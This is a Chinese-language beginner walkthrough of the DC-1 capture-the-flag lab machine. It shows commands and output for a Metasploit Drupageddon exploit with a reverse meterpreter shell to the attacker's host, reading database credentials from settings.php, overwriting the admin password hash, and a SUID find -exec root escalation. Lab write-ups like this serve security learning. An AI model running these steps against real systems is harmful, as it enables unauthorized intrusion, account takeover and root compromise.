萌新DC系列靶機滲透詳解之DC-1
在滲透測驗之前,有自己的滲透思路
1. 明確目標
我們的目標應該是找齊里面所有的 flag
根據每個 flag 的提示找到下一個 flag
2. 資訊收集
使用掃描工具尋找目標ip,在同一個網段下使用 arp-scan 掃描即可
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 f4:6a:92:10:12:f2 SHENZHEN FAST TECHNOLOGIES CO.,LTD
192.168.0.104 58:a0:23:79:16:11 Intel Corporate
192.168.0.100 48:2c:a0:e5:36:51 Xiaomi Communications Co Ltd
192.168.0.103 8c:c8:4b:60:79:f1 CHONGQING FUGUI ELECTRONICS CO.,LTD.
192.168.0.119 8c:c8:4b:60:79:f1 CHONGQING FUGUI ELECTRONICS CO.,LTD.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 5 responded
因為是自己的實驗環境,機器比較少 很明顯就能看出 靶機是 192.168.0.119
3. 漏洞探測
使用 nmap -A 命令收集資訊
使用 nmap 自帶的漏洞掃描腳本(時間可能比較長)
└─# nmap --script=vuln -A 192.168.0.119
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 15:00 CST
Nmap scan report for localhost (192.168.0.119)
Host is up (0.0046s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=localhost
| Found the following possible CSRF vulnerabilities:
|
| Path: http://localhost:80/
| Form id: user-login-form
|_ Form action: /node?destination=node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability #找出了這個系統版本的sql漏洞
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704 #有漏洞的編號 和描述↓
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
| http://www.securityfocus.com/bid/70595
| https://www.drupal.org/SA-CORE-2014-005
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
# ....................略....................
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 218.35 seconds
4. 漏洞驗證
使用 metasploit 進行滲透
# 首先肯定要進入metasploit吧
msfconsole
[!] The following modules could not be loaded!../
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.0.49-dev ]
+ -- --=[ 2142 exploits - 1141 auxiliary - 365 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x
#進入了msf控制臺,還記得nmap掃描出來的漏洞編號嘛,搜索一下
msf6 > search CVE-2014-3704
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/drupal_drupageddon
#直接使用它就好了
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
#看看它需要的設定
msf6 exploit(multi/http/drupal_drupageddon) > show options
Module options (exploit/multi/http/drupal_drupageddon):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.111 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Drupal 7.0 - 7.31 (form-cache PHP injection method)
#需要的設定引數有 RHOST(目標ip) 由于TARGETUR是為 / 的,不用設定也不要緊
#設定一下需要的引數
msf6 exploit(multi/http/drupal_drupageddon) > set rhost 192.168.0.119
rhost => 192.168.0.119
#開跑
msf6 exploit(multi/http/drupal_drupageddon) > run
[*] Started reverse TCP handler on 192.168.0.111:4444
[*] Sending stage (39282 bytes) to 192.168.0.119
[*] Meterpreter session 1 opened (192.168.0.111:4444 -> 192.168.0.119:42439) at 2021-07-18 15:28:08 +0800
meterpreter >
#成功進入系統!
5. 收集需要的資訊
#現在我們已經是在 meterpreter 控制臺里面了(也不知道咋形容,應該是控制臺吧?)
#常用命令和 bash 差不多,先ls看一眼里面有什么東西
meterpreter > ls
Listing: /var/www
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 174 fil 2013-11-21 04:45:59 +0800 .gitignore
100644/rw-r--r-- 5767 fil 2013-11-21 04:45:59 +0800 .htaccess
100644/rw-r--r-- 1481 fil 2013-11-21 04:45:59 +0800 COPYRIGHT.txt
100644/rw-r--r-- 1451 fil 2013-11-21 04:45:59 +0800 INSTALL.mysql.txt
100644/rw-r--r-- 1874 fil 2013-11-21 04:45:59 +0800 INSTALL.pgsql.txt
100644/rw-r--r-- 1298 fil 2013-11-21 04:45:59 +0800 INSTALL.sqlite.txt
100644/rw-r--r-- 17861 fil 2013-11-21 04:45:59 +0800 INSTALL.txt
100755/rwxr-xr-x 18092 fil 2013-11-01 18:14:15 +0800 LICENSE.txt
100644/rw-r--r-- 8191 fil 2013-11-21 04:45:59 +0800 MAINTAINERS.txt
100644/rw-r--r-- 5376 fil 2013-11-21 04:45:59 +0800 README.txt
100644/rw-r--r-- 9642 fil 2013-11-21 04:45:59 +0800 UPGRADE.txt
100644/rw-r--r-- 6604 fil 2013-11-21 04:45:59 +0800 authorize.php
100644/rw-r--r-- 720 fil 2013-11-21 04:45:59 +0800 cron.php
100644/rw-r--r-- 52 fil 2019-02-19 21:20:46 +0800 flag1.txt #這呢這呢
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 includes
100644/rw-r--r-- 529 fil 2013-11-21 04:45:59 +0800 index.php
100644/rw-r--r-- 703 fil 2013-11-21 04:45:59 +0800 install.php
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 misc
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 modules
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 profiles
100644/rw-r--r-- 1561 fil 2013-11-21 04:45:59 +0800 robots.txt
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 scripts #圈起來,這個也要考的
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 sites
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 themes
100644/rw-r--r-- 19941 fil 2013-11-21 04:45:59 +0800 update.php
100644/rw-r--r-- 2178 fil 2013-11-21 04:45:59 +0800 web.config
100644/rw-r--r-- 417 fil 2013-11-21 04:45:59 +0800 xmlrpc.php
#一眼就看見了 flag1.txt
#使用cat命令看一眼里面有什么
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
#(每一個好的內容管理系統都需要一個組態檔 - 你也一樣)
#提示的很明顯了,找到它的組態檔就可以了
#在上一步ls中找到了網站的檔案夾 40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 sites
#進去瞅一眼 看看有什么東西
meterpreter > cd sites
meterpreter > ls
Listing: /var/www/sites
=======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 904 fil 2013-11-21 04:45:59 +0800 README.txt
40755/rwxr-xr-x 4096 dir 2013-11-21 04:45:59 +0800 all
40555/r-xr-xr-x 4096 dir 2019-02-19 21:48:01 +0800 default
100644/rw-r--r-- 2365 fil 2013-11-21 04:45:59 +0800 example.sites.php
#很明顯有一個default檔案夾,進去看看
meterpreter > cd default
meterpreter > ls
Listing: /var/www/sites/default
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 23202 fil 2013-11-21 04:45:59 +0800 default.settings.php
40775/rwxrwxr-x 4096 dir 2019-02-19 21:10:31 +0800 files
100444/r--r--r-- 15989 fil 2019-02-19 21:48:01 +0800 settings.php
#找到設定檔案了,cat看一下里面的東西
meterpreter > cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the #暴力和字典攻擊不是最好的選擇
* only ways to gain access (and you WILL need access). #只有一潭訓取權限的方法(您將需要訪問權限)
* What can you do with these credentials? #你能用這些證書做什么?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
#...................略
#這flag提示啥了,咱先不管,拿到了它的用戶名密碼先登錄再說
#進入shell
meterpreter > shell
Process 3506 created.
Channel 9 created.
#因為有python 拿到bash權限就簡單了
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www/sites/default$
#稍微講一下這個 python -c "import pty;pty.spawn('/bin/bash')"
#分為兩塊說 首先是 python -c "*" 陳述句,可以在控制臺執行 python 代碼
#例如 python -c "print('hello,world')" [注意!不可以使用連續的"符號,這樣會讓python不知道哪里結尾]
#錯例 python -c "print("hello,world")"
# Traceback (most recent call last):
# File "<string>", line 1, in <module>
# NameError: name 'hello' is not defined
#
#另一塊就是 import pty (偽終端程式)
#參考了 pty 這個模塊,而 pty.spawn('/bin/bash') 就是參考了這個bash控制端
#接下來進入它的資料庫看看吧
www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4505
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
#成功登錄,看看它有什么資料庫先
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
#drupaldb 應該就是網站的資料庫了吧,進去看看
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
#看看有什么表
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users #這個是用戶表吧看看 |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
#還蠻長的,找一下需要的表就行
#因為有點長,這里使用\G來表示
mysql> select * from users\G;
select * from users\G;
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
3 rows in set (0.00 sec)
ERROR:
No query specified
#看這個密碼的樣式是來自php自帶的password-hash加密
#根據上個flag可以知道不能使用暴力破解密碼,那簡單,換個思路更新密碼就行
#根據第一步的ls能找到這個script檔案夾
#直接轉換密碼就好了
www-data@DC-1:/var/www$ php scripts/password-hash.sh password
php scripts/password-hash.sh password
password: password hash: $S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq
#再次進入mysql回到剛才的地方 update頂掉一個賬戶的密碼就行
mysql> update users set pass="$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq" where uid=1;
<s="$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq" where uid=1;
Query OK, 0 rows affected (0.00 sec)
Rows matched: 1 Changed: 0 Warnings: 0
#這樣子就能登錄網站了
#先進入網站吧
#在網站的左上角Dashboard中找到了flag3
flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
#特殊的 PERMS 會幫助找到 passwd 不過你需要執行 -exec 去解出如何獲得在陰影中的東西
#呃,翻譯貌似是這樣,好像是說使用PERMS和FIND找到passwd,因為兩個都大寫了嘛
#那么我們用 find 命令尋找flag4
www-data@DC-1:/var/www$ find / -name flag4*
find / -name flag4*
/home/flag4
/home/flag4/flag4.txt
#找著了,不僅找到了叫flag4的txt文本,還找到了flag4的檔案夾
#進入這個檔案夾打開看看吧
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
#你可以使用同樣的方法查找或訪問在root里面的flag嗎?
#也許可以,但是它并不是簡單能獲取的,或許是確實很簡單?
#那么最后一個flag就確定了,是提取root權限去訪問這個flag
#看了別的dalao的作業是使用 find提權
#簡單講就是 find 中有一個 -exec 的引數可以執行命令
#root的控制臺一般是在 /bin/sh 中
www-data@DC-1:/home/flag4$ find flag4.txt -exec "/bin/sh" \;
find flag4.txt -exec "/bin/sh" \;
#驗證提權
whoami
root
#成功!
cd /root
ls
thefinalflag.txt
#找到了最后一個flag了
cat thefinalflag.txt
Well done!!!!
#做的好!!!
Hopefully you've enjoyed this and learned some new skills.
#希望你能享受這個并且學到了新的東西
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#twitter廣告等巴拉巴拉
#完成
6. 總結
這次能學到的東西做出一個總結方便回顧
-
使用了 arp-scan -l 指令快速的找到了靶機地址
-
使用 nmap 自帶的漏洞掃描工具掃描出了漏洞
-
使用 msf 進行漏洞攻擊
-
在 site-default 檔案夾中訪問了 settings.php 查找它的配置資訊
-
使用了 python 中的 pty 模塊調出 bash 控制臺
python -c “import pty;pty.spawn(’/bin/bash’)”
-
使用了 php 自帶的腳本進行 hash 加密,頂掉了原有用戶的密碼
php scripts/password-hash.sh password
update [表名] set [更改名]="[更改后]" where [更改引數名稱]
-
使用 find 提權,一般 root 的 shell 就是在 /bin/sh 中
find [已有檔案] -exec “/bin/sh” ;
如果還有不懂的地方可以私信或評論區討論,共同進步
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289171.html
標籤:其他
上一篇:資訊搜集(一)